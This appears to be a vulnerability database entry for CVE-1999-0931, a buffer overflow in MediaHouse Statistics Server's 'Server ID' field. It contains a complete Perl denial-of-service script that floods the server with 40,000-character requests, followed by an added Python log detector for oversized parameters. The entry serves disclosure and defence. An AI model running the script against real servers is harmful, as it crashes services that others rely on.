MediaHouse Statistics Server "Server ID" Buffer Overflow Vulnerability


Vulnerability ID: 1105561
Vulnerability type: Buffer overflow
Published: 1999-09-30
Updated: 2005-05-02
CVE ID: CVE-1999-0931
CNNVD-ID: CNNVD-199909-058
Platform: Windows
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/19562
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-058
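|Vulnerability details
A buffer overflow vulnerability exists in MediaHouse Statistics Server. A remote attacker can exploit this vulnerability to execute commands.
|Exploit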
source: http://www.securityfocus.com/bid/734/info

The web interface for Statistics Server contains an unchecked buffer which accepts input from the "Server ID" field of the login webpage. While the login webpage has a 16 character restriction, this is easily circumventable by editing the HTML to remove the restriction. Entering a string of more than 3773 characters will crash the server. This bug could potentially be used to remotely execute arbitrary code.

#!/usr/bin/perl

###############################################################
# Sample DoS against the Mediahouse Statistics Server
# This was tested against 4.28 & 5.01 running on Windows NT 4.0
#
# Only use it to determine if your own Server is vulnerable!
#
# Per Bergehed ([email protected])
#
# http://w1.855.telia.com/~u85513179/security/exploits/mediahouse.html
#
# V1.0 - Check for "ss?form=statsredir&ID=..." buffer overflow.
# V1.1 - added check for "ss?form=setsite&ID=..." buffer overflow.
#

use IO::Socket;

print "############################################################\n";
print "# Simple DoS-attack against the Mediahouse Statistics Server\n";
print "# Tested with version 4.28 & 5.01\n";
print "\n";

if ($#ARGV != 0) 
{
        die "-> Please give the host address as argument.\n"
}

# First connection: send the two oversized requests.
opensocket ("\n");
print $remote "GET " . "ss?setsite=" . "A" x 40000 . "& HTTP/1.0\n\n";
print $remote "GET " . "ss?form=statsredir&ID=" . "A" x 40000 . "& HTTP/1.0\n\n";
close $remote;

# Second connection: if it cannot be opened, the server has stopped responding.
opensocket ("\n-> The server seemed to be vulnerable to this attack\n");
close $remote;
die "-> The server does not seem to be vulnerable to this attack\n";

sub opensocket 
{
        $remote = IO::Socket::INET->new (
                Proto => "tcp",
                PeerAddr => $ARGV[0],
                PeerPort => "http(80)",
        ) || die "# Can't open http-port on $ARGV[0]$_[0]";
        $remote->autoflush(1)
}

# EOF
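
For defenders, the advisory's two numbers (the 16 character form limit and the 3773 character crash threshold) make a simple log check. The following is an added example, not part of the original advisory or script: it assumes Common Log Format access logs, takes the `ss` path and the `ID` / `setsite` parameter names from the script above, and runs on constructed sample lines.

```python
import re
from urllib.parse import parse_qsl, urlsplit

FORM_LIMIT = 16      # length the login page enforces client-side only
CRASH_LENGTH = 3773  # longer values crash the server, per the advisory
WATCHED_PARAMS = {"id", "setsite"}  # parameter names used in the test script

# Assumption: the request appears quoted, as in Common Log Format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)(?: HTTP/[\d.]+)?"')

def classify(line):
    """Return (severity, param, length) for an oversized Server ID, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # Only the Statistics Server endpoint ("ss" or "/ss") is of interest.
    if url.path.rsplit("/", 1)[-1].lower() != "ss":
        return None
    worst = None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() not in WATCHED_PARAMS or len(value) <= FORM_LIMIT:
            continue
        if worst is None or len(value) > worst[2]:
            sev = "crash-length" if len(value) > CRASH_LENGTH else "over-form-limit"
            worst = (sev, name, len(value))
    return worst

def scan(lines):
    """Return [(line_index, severity, param, length)] for every flagged line."""
    return [(i, *hit) for i, line in enumerate(lines) if (hit := classify(line))]

PREFIX = '192.0.2.10 - - [01/Oct/1999:10:00:00 +0000] '
SAMPLE_LOG = [  # constructed lines, not captured traffic
    PREFIX + '"GET /ss?form=statsredir&ID=site01 HTTP/1.0" 200 512',
    PREFIX + '"GET /ss?form=statsredir&ID=' + "B" * 40 + ' HTTP/1.0" 200 512',
    PREFIX + '"GET ss?setsite=' + "A" * 4000 + '& HTTP/1.0" - -',
    PREFIX + '"GET /index.html?ID=' + "C" * 5000 + ' HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for idx, sev, param, length in scan(SAMPLE_LOG):
        print(f"line {idx}: {sev} {param}={length} chars")
```

Any value over 16 characters means the request did not come from the unmodified login form, so the lower threshold is worth alerting on even when the server stays up.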
|References

Source: BID
Name: 734
Link: http://www.securityfocus.com/bid/734
